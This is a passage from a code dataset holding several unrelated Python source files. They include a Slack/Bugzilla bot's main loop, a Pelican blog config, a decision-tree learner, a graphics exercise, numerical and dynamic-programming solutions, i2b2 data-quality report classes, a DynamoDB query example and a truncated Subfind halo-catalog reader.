with status MODIFIED or later which are attached to bootimage\n # bumps in POST or earlier, and move the bugs back to POST.\n for status in ('ASSIGNED', 'POST'):\n bz.update_bootimage_bug_status(\n status,\n ['MODIFIED', 'ON_QA', 'VERIFIED', 'CLOSED'],\n 'POST',\n 'The fix for this bug will not be delivered to customers until it lands in an updated bootimage. That process is tracked in bug {bootimage}, which has status {status}. Moving this bug back to POST.',\n )\n\n # Find POST+built bugs which are attached to bootimage bumps in MODIFIED\n # or ON_QA, and move them to MODIFIED.\n for status in ('MODIFIED', 'ON_QA'):\n bz.update_bootimage_bug_status(\n status,\n ['POST'],\n 'MODIFIED',\n 'The fix for this bug has landed in a bootimage bump, as tracked in bug {bootimage} (now in status {status}). Moving this bug to MODIFIED.',\n built=True,\n )\n\n # Find POST+built bugs with reviewed-in-sprint- and set\n # reviewed-in-sprint+.\n if maintenance:\n bugs = bz.query(\n status='POST',\n whiteboard=' '.join([\n bz.BOOTIMAGE_BUG_WHITEBOARD,\n bz.BOOTIMAGE_BUG_BUILT_WHITEBOARD,\n ]),\n flag='reviewed-in-sprint-',\n )\n if bugs:\n bz.api.update_bugs([b.id for b in bugs], bz.api.build_update(\n flags=[\n {'name': 'reviewed-in-sprint', 'status': '+'},\n ],\n # Don't send email\n minor_update=True\n ))\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description='Bugzilla helper bot for Slack.')\n parser.add_argument('-c', '--config', metavar='FILE',\n default='~/.rhcosbot', help='config file')\n parser.add_argument('-d', '--database', metavar='FILE',\n default='~/.rhcosbot-db', help='database file')\n args = parser.parse_args()\n\n # Read config\n with open(os.path.expanduser(args.config)) as fh:\n config = DottedDict(yaml.safe_load(fh))\n config.database = os.path.expanduser(args.database)\n config.releases = Releases.from_config(config)\n env_map = (\n ('RHCOSBOT_SLACK_APP_TOKEN', 'slack-app-token'),\n ('RHCOSBOT_SLACK_TOKEN', 'slack-token'),\n ('RHCOSBOT_BUGZILLA_KEY', 'bugzilla-key')\n )\n for env, config_key in env_map:\n v = os.environ.get(env)\n if v:\n setattr(config, config_key, v)\n\n # Connect to services\n client = WebClient(token=config.slack_token)\n # store our user ID\n config.bot_id = client.auth_test()['user_id']\n bz = Bugzilla(config)\n if not bz.api.logged_in:\n raise Exception('Did not authenticate')\n db = Database(config)\n\n # Start socket-mode listener in the background\n socket_client = SocketModeClient(app_token=config.slack_app_token,\n web_client=WebClient(token=config.slack_token))\n socket_client.socket_mode_request_listeners.append(\n lambda socket_client, req: process_event(config, socket_client, req))\n socket_client.connect()\n\n # Run periodic tasks\n maint_period = config.bugzilla_maintenance_interval // config.bugzilla_poll_interval\n for i in itertools.count():\n periodic(config, db, bz, i % maint_period == 0)\n time.sleep(config.bugzilla_poll_interval)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"rhcosbot.py","file_name":"rhcosbot.py","file_ext":"py","file_size_in_byte":41706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"553550630","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = u'ProjectKitsune'\nSITENAME = u\"ProjectKitsune\"\nSITEURL = ''\n\nPATH = 'content'\n\nTIMEZONE = 'UTC'\n\nDEFAULT_LANG = u'en'\n\nFEED_ALL_ATOM = 'feeds/atom.xml'\nCATEGORY_FEED_ATOM = 'feeds/categories/%s/atom.xml'\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\nTAG_FEED_ATOM = 'feeds/tags/%s/atom.xml'\n\n# Blogroll\nLINKS = (('Pelican', 'http://getpelican.com/'),\n ('Python.org', 'http://python.org/'),\n ('Jinja2', 'http://jinja.pocoo.org/'),\n ('You can modify those links in your config file', '#'),)\n\n# Social widget\nSOCIAL = (\n ('rss', FEED_ALL_ATOM),\n)\n\nDEFAULT_PAGINATION = 10\n\n# Uncomment following line if you want document-relative URLs when developing\n# RELATIVE_URLS = True\n\nTHEME = 'theme'\nDELETE_OUTPUT_DIRECTORY = True\nINDEX_SAVE_AS = 'blog/index.html'\nDELETE_OUTPUT_DIRECTORY = True\nARTICLE_URL = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/'\nARTICLE_SAVE_AS = '{}/index.html'.format(ARTICLE_URL)\nMENUITEMS = (\n ('Blog', '/blog'),\n ('FoxBSD', '/pages/foxbsd.html'),\n ('Development', '/pages/development.html'),\n)\n","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"436031874","text":"\nfrom math import log\n\n\ndef shannon_entropy(dataset):\n \"\"\"[summary]\n\n Arguments:\n dataset {[type]} -- [description]\n\n Returns:\n [type] -- [description]\n \"\"\"\n count = len(dataset)\n\n label_dict = {} # an empty dict\n\n for row in dataset:\n key = row[-1]\n if key not in label_dict.keys():\n label_dict[key] = 0\n\n label_dict[key] += 1\n\n entropy = 0.0\n\n for key in label_dict:\n prob = float(label_dict[key] / count)\n entropy = entropy - prob * log(prob, 2)\n\n return entropy\n\n\ndef split_dataset(dataset, feature_index, feature_value):\n \"\"\"\n Arguments:\n dataset {2d matrix} -- the last column is class, all other columns\n are features. each row represents one data sample.\n feature_index {int} -- the index of feature used to split dataset\n feature_value {int} -- only data samples that have value at \"feature_index\"\n equals to \"feature_value\" are copied into sub_dataset.\n\n Returns:\n [2D Matrix] -- a sub_dataset, all samples in the sub_dataset\n have the value at \"feature_index\" equals \"feature_value\".\n the column of \"feature_index\" is removed in the sub_dataset.\n i.e. columns_of_sub_dataset = columns_of_dataset - 1\n \"\"\"\n sub_dataset = []\n\n for row in dataset:\n if row[feature_index] == feature_value:\n sub_row = row[:]\n del(sub_row[feature_index])\n sub_dataset.append(sub_row)\n\n return sub_dataset\n\n\ndef choose_best_feature_to_split(dataset):\n \"\"\" decide which feature is best to split dataset\n\n iterate over all features, split dataset busing each feature,\n calculate the entropy of each split, find the feature whose splt\n has the lowest entropy.\n\n Arguments:\n dataset {2d matrix} -- the last column is class, all other columns\n are features. each row represents one data sample.\n\n Returns:\n [int] -- the feature column index whose split has lowest entropy\n \"\"\"\n feature_count = len(dataset[0]) - 1\n\n best_feature = -1\n best_entropy = float('inf')\n\n for i in range(feature_count):\n feature_list = [row[i] for row in dataset]\n unique_vals = set(feature_list)\n new_entropy = 0.0\n\n for value in unique_vals:\n sub_dataset = split_dataset(dataset, i, value)\n prob = len(sub_dataset)/float(len(dataset))\n new_entropy += prob * shannon_entropy(sub_dataset)\n\n if (new_entropy < best_entropy):\n best_entropy = new_entropy\n best_feature = i\n\n return best_feature\n\n\ndef majority_count(label_list):\n label_dict = {}\n\n for item in label_list:\n if item not in label_dict.keys():\n label_dict[item] = 0\n label_dict[item] += 1\n\n sorted_list = sorted(label_dict.values(), reverse=True)\n return sorted_list[0]\n\n\ndef create_tree(dataset, feature_names):\n \"\"\" create a decision tree for the input dataset\n\n Arguments:\n dataset {2d matrix} -- the last column is class, all other columns\n are features. each row represents one data sample.\n feature_names {list of strings} -- names of each feature\n columns_of_feature_names = columns_of_dataset - 1\n\n Returns:\n [dict] -- tree as dict\n \"\"\"\n label_list = [row[-1] for row in dataset]\n\n # there is only one unique value in class_list\n if label_list.count(label_list[0]) == len(label_list):\n return label_list[0]\n\n # there is no feature to classfy\n if len(dataset[0]) == 1:\n return majority_count(label_list)\n\n best_feature_index = choose_best_feature_to_split(dataset)\n best_feature_names = feature_names[best_feature_index]\n\n tree = {best_feature_names: {}}\n\n sub_feature_names = feature_names[:]\n del(sub_feature_names[best_feature_index])\n\n unique_vals = set([row[best_feature_index] for row in dataset])\n\n for val in unique_vals:\n sub_dataset = split_dataset(dataset, best_feature_index, val)\n tree[best_feature_names][val] = create_tree(sub_dataset, sub_feature_names)\n\n return tree\n\n\ndef classify(input_tree, feature_names, test_sample):\n \"\"\"[summary]\n\n Arguments:\n input_tree {dict} -- [description]\n feature_labels {[type]} -- [description]\n test_vec {[type]} -- [description]\n \"\"\"\n root_feature_name = list(input_tree.keys())[0]\n second_dict = input_tree[root_feature_name]\n feature_index = feature_names.index(root_feature_name)\n\n for key in second_dict.keys():\n if test_sample[feature_index] == key:\n if type(second_dict[key]).__name__ == \"dict\":\n classify_result = classify(second_dict[key], feature_names, test_sample)\n else:\n classify_result = second_dict[key]\n\n return classify_result\n\n\n\n\ndef test_dataset():\n dataset = [[1, 1, 'yes'], [1, 1, 'yes'], [1, 0, 'no'], [0, 1, 'no'], [0, 1, 'no']]\n feature_names = ['no surfacing', 'flippers']\n return dataset, labels\n\n tree = create_tree(dataset, feature_names)\n print(tree)\n\n t = classify(tree, feature_names, [1, 1])\n print(t)\n\n\n\ndef contact_lens_type():\n fr = open(\"dataset/lenses.txt\")\n lens_dataset = [line.strip().split(\"\\t\") for line in fr.readlines()]\n\n feature_names = [\"age\", \"prescript\", \"astigmatic\", \"tear_rate\"]\n\n lens_tree = create_tree(lens_dataset, feature_names)\n\n print(lens_tree)\n\n\ncontact_lens_type()\n","sub_path":"book-ml-action/decision_trees.py","file_name":"decision_trees.py","file_ext":"py","file_size_in_byte":5476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"592266024","text":"from graphics import *\n\ndef main():\n doorColour, lightsOn, house_number, window_size = getInputs()\n drawHouse(doorColour, lightsOn, house_number, window_size)\n\n\ndef getInputs():\n window_size = int(\n input(\"Please enter the size of the window (single value):\"))\n doorColour = input(\"Enter door colour: \")\n lightsYN = input(\"Are the lights on (y/n): \")\n lightsOn = lightsYN[0] == \"y\"\n housenumber = int(input(\"Please enter the house number: \"))\n return doorColour, lightsOn, housenumber, window_size\n\n\ndef drawHouse(doorColour, lightsOn, house_number, window_size):\n win = GraphWin(\"House\", window_size, window_size)\n win.setCoords(200, 200, 0, 0)\n\n roof = Polygon(Point(2, 60), Point(42, 2),\n Point(158, 2), Point(198, 60))\n roof.setFill(\"pink\")\n roof.draw(win)\n # draw wall and door\n drawRectangle(win, Point(2, 60), Point(198, 198), \"brown\")\n drawRectangle(win, Point(30, 110), Point(80, 198), doorColour)\n # house_number\n message = Text(Point(55, 154), house_number).draw(win)\n # draw window\n if lightsOn:\n windowColour = \"yellow\"\n else:\n windowColour = \"black\"\n drawRectangle(win, Point(110, 110), Point(170, 170), windowColour)\n win.getMouse()\n\n\ndef drawRectangle(win, point1, point2, colour):\n rectangle = Rectangle(point1, point2)\n rectangle.setFill(colour)\n rectangle.setOutline(colour)\n rectangle.draw(win)\n\n\nmain()\n","sub_path":"T1 Week 8/street.py","file_name":"street.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"399997504","text":"class Solution:\n # @param A : integer\n # @return an integer\n def climbStairs(self, A):\n if A <= 1:\n return A\n\n dp = [0] * A\n\n dp[0] = 1\n dp[1] = 2\n\n for i in range(2, A):\n dp[i] = dp[i - 1] + dp[i - 2]\n\n return dp[-1]\n\n\nprint(Solution().climbStairs(3) == 3)\nprint(Solution().climbStairs(30) == 1346269)\n","sub_path":"ib/level_7/dynamic_programming/climb_stairs.py","file_name":"climb_stairs.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"168653635","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Mar 17 09:23:31 2019\r\n\r\n@author: jiryi\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport scipy.linalg as spla\r\nimport matplotlib.pyplot as plt\r\n\r\ndef data_prepare(dimension):\r\n \r\n basis1 = [1.0/(i+1) for i in np.arange(dimension)]\r\n basis2 = [1.0/(dimension+i) for i in np.arange(dimension)]\r\n A = spla.hankel(basis1,basis2)\r\n b = np.ones((dimension,))\r\n \r\n return A,b\r\n\r\ndef conjugate_gradient(x):\r\n \r\n # data preparation\r\n dimension = len(x)\r\n A, b = data_prepare(dimension)\r\n r = np.matmul(A,x) - b\r\n p = -r\r\n r_norm = np.linalg.norm(r)\r\n r_norm_arr = []\r\n r_norm_arr.append(r_norm)\r\n \r\n # parameter set up\r\n tol = 10**(-6)\r\n MaxIte = 500\r\n i = 0\r\n \r\n print(\"\\n\")\r\n print(\"Now report results in %s-D case\" % dimension)\r\n while r_norm > tol:\r\n \r\n alpha = np.dot(r,r) / np.dot(p,np.matmul(A,p))\r\n x = x + alpha*p\r\n r_prev = r\r\n r = r + alpha*np.matmul(A,p)\r\n beta = np.dot(r,r) / np.dot(r_prev,r_prev)\r\n p = -r + beta*p\r\n r_norm = np.linalg.norm(r)\r\n \r\n i = i+1\r\n r_norm_arr.append(r_norm)\r\n \r\n if i%50 == 0:\r\n print(\"Iteration: {}, residual norm: {}\\n\".format(i,r_norm))\r\n \r\n if i > MaxIte:\r\n print(\"Cannot converge within {} iterations.\\n\".format(MaxIte))\r\n break\r\n \r\n print(\"Terminate at iteration {}, the residual norm is {}\\n\".format(i,r_norm))\r\n print(\"the final solution is:\\n {}\".format(x))\r\n \r\n return x,r_norm_arr\r\n\r\ndef vis(residual_norm,dimension):\r\n plt.figure()\r\n plt.plot(np.log10(r_norm_arr),\"-*\")\r\n plt.xlabel(\"# of iterations\")\r\n plt.ylabel(\"residual norm in log10 scale\")\r\n plt.title(\"%s-D case\" % dimension)\r\n plt.show()\r\n\r\nif __name__ == \"__main__\":\r\n \r\n dimension = [5, 8, 12, 20]\r\n for d in dimension:\r\n \r\n x = np.zeros((d,))\r\n x,r_norm_arr = conjugate_gradient(x)\r\n vis(r_norm_arr,d)","sub_path":"conjugate_gradient.py","file_name":"conjugate_gradient.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"105331552","text":"#!/usr/bin/env python3\r\n\r\nfrom reporter.uhl_reports.i2b2.patient_mapping_tests import (\r\n PatientMappingDuplicatesReport,\r\n PatientMappingMultiplesIdsReport,\r\n)\r\nfrom reporter.uhl_reports.i2b2.patient_summary_tests import (\r\n PatientSummaryDuplicatesReport,\r\n PatientSummaryMissingData,\r\n PatientSummaryMissingParticipants,\r\n)\r\nfrom reporter.uhl_reports.i2b2.valid_enrolment_tests import (\r\n ValidEnrolmentsStudyIdDuplicates,\r\n ValidEnrolmentsContactMultipleRecruitments,\r\n RecruitedWithoutFullConsent,\r\n PatientSummaryMissingRecruited,\r\n)\r\nfrom reporter.emailing import (\r\n RECIPIENT_PREECLAMPSIA_ADMIN as RECIPIENT_ADMIN,\r\n)\r\nfrom reporter.core import Schedule\r\n\r\n\r\nI2B2_DB = \"i2b2_app03_preeclampsia_Data\"\r\n\r\n\r\nclass PreeclampsiaPatientMappingDuplicatesReport(\r\n PatientMappingDuplicatesReport):\r\n def __init__(self):\r\n super().__init__(I2B2_DB, schedule=Schedule.never)\r\n\r\n\r\nclass PreeclampsiaPatientMappingMultiplesIdsReport(\r\n PatientMappingMultiplesIdsReport):\r\n def __init__(self):\r\n super().__init__(I2B2_DB, schedule=Schedule.never)\r\n\r\n\r\nclass PreeclampsiaPatientSummaryDuplicatesReport(\r\n PatientSummaryDuplicatesReport):\r\n def __init__(self):\r\n super().__init__(I2B2_DB, schedule=Schedule.never)\r\n\r\n\r\nclass PreeclampsiaPatientSummaryMissingData(\r\n PatientSummaryMissingData):\r\n def __init__(self):\r\n super().__init__(\r\n I2B2_DB,\r\n [\r\n 'CiviCrmId',\r\n 'CiviCrmCaseId',\r\n 'NhsNumber',\r\n 'UhlSystemNumber',\r\n 'StudyNumber',\r\n 'Gender',\r\n 'DateOfBirth',\r\n 'Ethnicity',\r\n ],\r\n schedule=Schedule.never,\r\n )\r\n\r\n\r\nclass PreeclampsiaPatientSummaryMissingParticipants(\r\n PatientSummaryMissingParticipants):\r\n def __init__(self):\r\n super().__init__(I2B2_DB, schedule=Schedule.never)\r\n\r\n\r\nclass PreeclampsiaValidEnrolmentsStudyIdDuplicates(\r\n ValidEnrolmentsStudyIdDuplicates):\r\n def __init__(self):\r\n super().__init__(\r\n I2B2_DB,\r\n [RECIPIENT_ADMIN],\r\n schedule=Schedule.never,\r\n )\r\n\r\n\r\nclass PreeclampsiaValidEnrolmentsContactMultipleRecruitments(\r\n ValidEnrolmentsContactMultipleRecruitments):\r\n def __init__(self):\r\n super().__init__(\r\n I2B2_DB,\r\n [RECIPIENT_ADMIN],\r\n schedule=Schedule.never,\r\n )\r\n\r\n\r\nclass PreeclampsiaRecruitedWithoutFullConsent(\r\n RecruitedWithoutFullConsent):\r\n def __init__(self):\r\n super().__init__(\r\n I2B2_DB,\r\n [RECIPIENT_ADMIN],\r\n schedule=Schedule.never,\r\n )\r\n\r\n\r\nclass PreeclampsiaPatientSummaryMissingRecruited(\r\n PatientSummaryMissingRecruited):\r\n def __init__(self):\r\n super().__init__(\r\n I2B2_DB,\r\n [RECIPIENT_ADMIN],\r\n schedule=Schedule.never,\r\n )\r\n","sub_path":"reporter/uhl_reports/preeclampsia/data_quality/i2b2_dq.py","file_name":"i2b2_dq.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"469869154","text":"import boto3\nfrom boto3.dynamodb.conditions import Key, Attr\n\n# Get the service resource.\ndynamodb = boto3.resource('dynamodb', endpoint_url='http://localhost:8000')\n\n# Instantiate a table resource object without actually\n# creating a DynamoDB table. Note that the attributes of this table\n# are lazy-loaded: a request is not made nor are the attribute\n# values populated until the attributes\n# on the table resource are accessed or its load() method is called.\ntable = dynamodb.Table('users')\n\n# QUERY\nresponse = table.query(\n KeyConditionExpression=Key('username').eq('johndoe')\n)\nitems = response['Items']\nprint(items)\n\n# SCAN\nresponse = table.scan(\n FilterExpression=Attr('age').lt(27)\n)\nitems = response['Items']\nprint(items)\n\n# SCAN and CONDITIONS\n\nresponse = table.scan(\n FilterExpression=Attr('first_name').begins_with('J') & Attr('account_type').eq('super_user')\n)\nitems = response['Items']\nprint(items)\n\nresponse = table.scan(\n FilterExpression=Attr('address.state').eq('CA')\n)\nitems = response['Items']\nprint(items)","sub_path":"01_Kit_AWS_SDK/code/8_Querying_and_scanning.py","file_name":"8_Querying_and_scanning.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"450112194","text":"# code for reading Subfind's subhalo_tab files\r\n# usage e.g.:\r\n#\r\n# import readsubf\r\n# cat = readsubf.subfind_catalog(\"./m_10002_h_94_501_z3_csf/\",63,masstab=True)\r\n# print( cat.nsubs\r\n# print( \"largest halo x position = \",cat.sub_pos[0][0] \r\n\r\nimport numpy as np\r\nimport os\r\nimport sys\r\n \r\nclass subfind_catalog:\r\n def __init__(self, basedir, snapnum, group_veldisp = False, masstab = False, long_ids = False, swap = False): # all optional parameters are not needed for HDF5 catalogues\r\n self.swap = swap\r\n \r\n self.filebase = basedir + \"/groups_\" + str(snapnum).zfill(3) + \"/subhalo_tab_\" + str(snapnum).zfill(3) + \".\"\r\n self.idbase = basedir + \"/groups_\" + str(snapnum).zfill(3) + \"/subhalo_ids_\" + str(snapnum).zfill(3) + \".\"\r\n \r\n curfile = self.filebase + str(\"0\") \r\n if (not os.path.exists(curfile)):\r\n if os.path.exists(basedir + \"/fof_subhalo_tab_\" + str(snapnum).zfill(3) + \".hdf5\"):\r\n self.is_hdf5 = True\r\n self.filebase = basedir + \"/fof_subhalo_tab_\" + str(snapnum).zfill(3) + \".\"\r\n elif os.path.exists(basedir + \"/groups_\" + str(snapnum).zfill(3) + \"/fof_subhalo_tab_\" + str(snapnum).zfill(3) + \".0.hdf5\"):\r\n self.is_hdf5 = True\r\n self.filebase = basedir + \"/groups_\" + str(snapnum).zfill(3) + \"/fof_subhalo_tab_\" + str(snapnum).zfill(3) + \".\"\r\n else:\r\n print( \"file not found:\", curfile, basedir + \"/fof_subhalo_tab_\" + str(snapnum).zfill(3) + \".hdf5\",basedir + \"/groups_\" + str(snapnum).zfill(3) + \"/fof_subhalo_tab_\" + str(snapnum).zfill(3) + \".0.hdf5\")\r\n sys.exit()\r\n else:\r\n self.is_hdf5 = False\r\n\r\n print()\r\n print( \"reading subfind catalog for snapshot\",snapnum,\"of\",basedir)\r\n\r\n if (not self.is_hdf5): # standard file\r\n \r\n if long_ids: self.id_type = np.uint64\r\n else: self.id_type = np.uint32\r\n \r\n self.group_veldisp = group_veldisp\r\n self.masstab = masstab\r\n \r\n filenum = 0\r\n doneflag = False\r\n skip_gr = 0\r\n skip_sub = 0\r\n while not doneflag:\r\n curfile = self.filebase + str(filenum)\r\n \r\n if (not os.path.exists(curfile)):\r\n print( \"file not found:\", curfile)\r\n sys.exit()\r\n \r\n f = open(curfile,'rb')\r\n \r\n ngroups = np.fromfile(f, dtype=np.uint32, count=1)[0]\r\n totngroups = np.fromfile(f, dtype=np.uint32, count=1)[0]\r\n nids = np.fromfile(f, dtype=np.uint32, count=1)[0]\r\n totnids = np.fromfile(f, dtype=np.uint64, count=1)[0]\r\n ntask = np.fromfile(f, dtype=np.uint32, count=1)[0]\r\n nsubs = np.fromfile(f, dtype=np.uint32, count=1)[0]\r\n totnsubs = np.fromfile(f, dtype=np.uint32, count=1)[0]\r\n \r\n if swap:\r\n ngroups = ngroups.byteswap()\r\n totngroups = totngroups.byteswap()\r\n nids = nids.byteswap()\r\n totnids = totnids.byteswap()\r\n ntask = ntask.byteswap()\r\n nsubs = nsubs.byteswap()\r\n totnsubs = totnsubs.byteswap()\r\n \r\n if filenum == 0:\r\n self.ngroups = totngroups\r\n self.nids = totnids\r\n self.nfiles = ntask\r\n self.nsubs = totnsubs\r\n\r\n self.group_len = np.empty(totngroups, dtype=np.uint32)\r\n self.group_offset = np.empty(totngroups, dtype=np.uint32)\r\n self.group_mass = np.empty(totngroups, dtype=np.float64)\r\n self.group_pos = np.empty(totngroups, dtype=np.dtype((np.float64,3)))\r\n self.group_m_mean200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_r_mean200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_m_crit200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_r_crit200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_m_tophat200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_r_tophat200 = np.empty(totngroups, dtype=np.float64)\r\n if group_veldisp:\r\n self.group_veldisp_mean200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_veldisp_crit200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_veldisp_tophat200 = np.empty(totngroups, dtype=np.float64)\r\n self.group_contamination_count = np.empty(totngroups, dtype=np.uint32)\r\n self.group_contamination_mass = np.empty(totngroups, dtype=np.float64)\r\n self.group_nsubs = np.empty(totngroups, dtype=np.uint32)\r\n self.group_firstsub = np.empty(totngroups, dtype=np.uint32)\r\n \r\n self.sub_len = np.empty(totnsubs, dtype=np.uint32)\r\n self.sub_offset = np.empty(totnsubs, dtype=np.uint32)\r\n self.sub_parent = np.empty(totnsubs, dtype=np.uint32)\r\n self.sub_mass = np.empty(totnsubs, dtype=np.float64)\r\n self.sub_pos = np.empty(totnsubs, dtype=np.dtype((np.float64,3)))\r\n self.sub_vel = np.empty(totnsubs, dtype=np.dtype((np.float64,3)))\r\n self.sub_cm = np.empty(totnsubs, dtype=np.dtype((np.float64,3)))\r\n self.sub_spin = np.empty(totnsubs, dtype=np.dtype((np.float64,3)))\r\n self.sub_veldisp = np.empty(totnsubs, dtype=np.float64)\r\n self.sub_vmax = np.empty(totnsubs, dtype=np.float64)\r\n self.sub_vmaxrad = np.empty(totnsubs, dtype=np.float64)\r\n self.sub_halfmassrad = np.empty(totnsubs, dtype=np.float64)\r\n self.sub_id_mostbound = np.empty(totnsubs, dtype=self.id_type)\r\n self.sub_grnr = np.empty(totnsubs, dtype=np.uint32)\r\n if masstab:\r\n self.sub_masstab = np.empty(totnsubs, dtype=np.dtype((np.float64,6)))\r\n \r\n if ngroups > 0:\r\n locs = slice(skip_gr, skip_gr + ngroups)\r\n self.group_len[locs] = np.fromfile(f, dtype=np.uint32, count=ngroups)\r\n self.group_offset[locs] = np.fromfile(f, dtype=np.uint32, count=ngroups)\r\n self.group_mass[locs] = np.fromfile(f, dtype=np.float64, count=ngroups)\r\n self.group_pos[locs] = np.fromfile(f, dtype=np.dtype((np.float64,3)), count=ngroups)\r\n self.group_m_mean200[locs] = np.fromfile(f, dtype=np.float64, count=ngroups)\r\n self.group_r_mean200[locs] = np.fromfile(f, dtype=np.float64, count=ngroups)\r\n self.group_m_crit200[locs] = np.fromfile(f, dtype=np.float64, count=ngroups)\r\n self.group_r_crit200[locs] = np.fromfile(f, dtype=np.float64, count=ngroups)\r\n self.group_m_tophat200[locs] = np.fromfile(f, dtype=np.float64, count=ngroups)\r\n self.group_r_tophat200[locs] = np.fromfile(f, dtype=np.float64, count=ngroups)\r\n if group_veldisp:\r\n self.group_veldisp_mean200[locs] = np.fromfile(f, dtype=np.float64, count=ngroups)\r\n self.group_veldisp_crit200[locs] = np.fromfile(f, dtype=np.float64, count=ngroups)\r\n self.group_veldisp_tophat200[locs] = np.fromfile(f, dtype=np.float64, count=ngroups)\r\n self.group_contamination_count[locs] = np.fromfile(f, dtype=np.uint32, count=ngroups)\r\n self.group_contamination_mass[locs] = np.fromfile(f, dtype=np.float64, count=ngroups)\r\n self.group_nsubs[locs] = np.fromfile(f, dtype=np.uint32, count=ngroups)\r\n self.group_firstsub[locs] = np.fromfile(f, dtype=np.uint32, count=ngroups) \r\n skip_gr += ngroups\r\n \r\n if nsubs > 0:\r\n locs = slice(skip_sub, skip_sub + nsubs)\r\n self.sub_len[locs] = np.fromfile(f, dtype=np.uint32, count=nsubs)\r\n self.sub_offset[locs] = np.fromfile(f, dtype=np.uint32, count=nsubs)\r\n self.sub_parent[locs] = np.fromfile(f, dtype=np.uint32, count=nsubs)\r\n self.sub_mass[locs] = np.fromfile(f, dtype=np.float64, count=nsubs)\r\n self.sub_pos[locs] = np.fromfile(f, dtype=np.dtype((np.float64,3)), count=nsubs)\r\n self.sub_vel[locs] = np.fromfile(f, dtype=np.dtype((np.float64,3)), count=nsubs)\r\n self.sub_cm[locs] = np.fromfile(f, dtype=np.dtype((np.float64,3)), count=nsubs)\r\n self.sub_spin[locs] = np.fromfile(f, dtype=np.dtype((np.float64,3)), count=nsubs)\r\n self.sub_veldisp[locs] = np.fromfile(f, dtype=np.float64, count=nsubs)\r\n self.sub_vmax[locs] = np.fromfile(f, dtype=np.float64, count=nsubs)\r\n self.sub_vmaxrad[locs] = np.fromfile(f, dtype=np.float64, count=nsubs)\r\n self.sub_halfmassrad[locs] = np.fromfile(f, dtype=np.float64, count=nsubs)\r\n self.sub_id_mostbound[locs] = np.fromfile(f, dtype=self.id_type, count=nsubs)\r\n self.sub_grnr[locs] = np.fromfile(f, dtype=np.uint32, count=nsubs)\r\n if masstab:\r\n self.sub_masstab[locs] = np.fromfile(f, dtype=np.dtype((np.float64,6)), count=nsubs)\r\n skip_sub += nsubs\r\n\r\n curpos = f.tell()\r\n f.seek(0,os.SEEK_END)\r\n if curpos != f.tell(): print( \"Warning: finished reading before EOF for file\",filenum)\r\n f.close() \r\n #print( 'finished with file number',filenum,\"of\",ntask\r\n filenum += 1\r\n if filenum == self.nfiles:\r\n doneflag = True\r\n \r\n if swap:\r\n self.group_len.byteswap(True)\r\n self.group_offset.byteswap(True)\r\n self.group_mass.byteswap(True)\r\n self.group_pos.byteswap(True)\r\n self.group_m_mean200.byteswap(True)\r\n self.group_r_mean200.byteswap(True)\r\n self.group_m_crit200.byteswap(True)\r\n self.group_r_crit200.byteswap(True)\r\n self.group_m_tophat200.byteswap(True)\r\n self.group_r_tophat200.byteswap(True)\r\n if group_veldisp:\r\n self.group_veldisp_mean200.byteswap(True)\r\n self.group_veldisp_crit200.byteswap(True)\r\n self.group_veldisp_tophat200.byteswap(True)\r\n self.group_contamination_count.byteswap(True)\r\n self.group_contamination_mass.byteswap(True)\r\n self.group_nsubs.byteswap(True)\r\n self.group_firstsub.byteswap(True)\r\n \r\n self.sub_len.byteswap(True)\r\n self.sub_offset.byteswap(True)\r\n self.sub_parent.byteswap(True)\r\n self.sub_mass.byteswap(True)\r\n self.sub_pos.byteswap(True)\r\n self.sub_vel.byteswap(True)\r\n self.sub_cm.byteswap(True)\r\n self.sub_spin.byteswap(True)\r\n self.sub_veldisp.byteswap(True)\r\n self.sub_vmax.byteswap(True)\r\n self.sub_vmaxrad.byteswap(True)\r\n self.sub_halfmassrad.byteswap(True)\r\n self.sub_id_mostbound.byteswap(True)\r\n self.sub_grnr.byteswap(True)\r\n if masstab:\r\n self.sub_masstab.byteswap(True)\r\n \r\n print()\r\n print( \"number of groups =\", self.ngroups)\r\n print( \"number of subgroups =\", self.nsubs)\r\n if self.nsubs > 0:\r\n print( \"largest group of length\",self.group_len[0],\"has\",self.group_nsubs[0],\"subhalos\")\r\n print()\r\n \r\n else: # HDF5 file\r\n \r\n import h5py\r\n \r\n self.masstab = True\r\n \r\n filenum = 0\r\n doneflag = False\r\n skip_gr = 0\r\n skip_sub = 0\r\n \r\n while not doneflag:\r\n curfile = self.filebase + str(filenum) + \".hdf5\"\r\n \r\n if filenum == 0:\r\n if not os.path.exists(curfile):\r\n curfile = self.filebase + \"hdf5\"\r\n\r\n f = h5py.File(curfile, \"r\")\r\n \r\n totngroups = f[\"Header\"].attrs[\"Ngroups_Total\"]\r\n totnsubs = 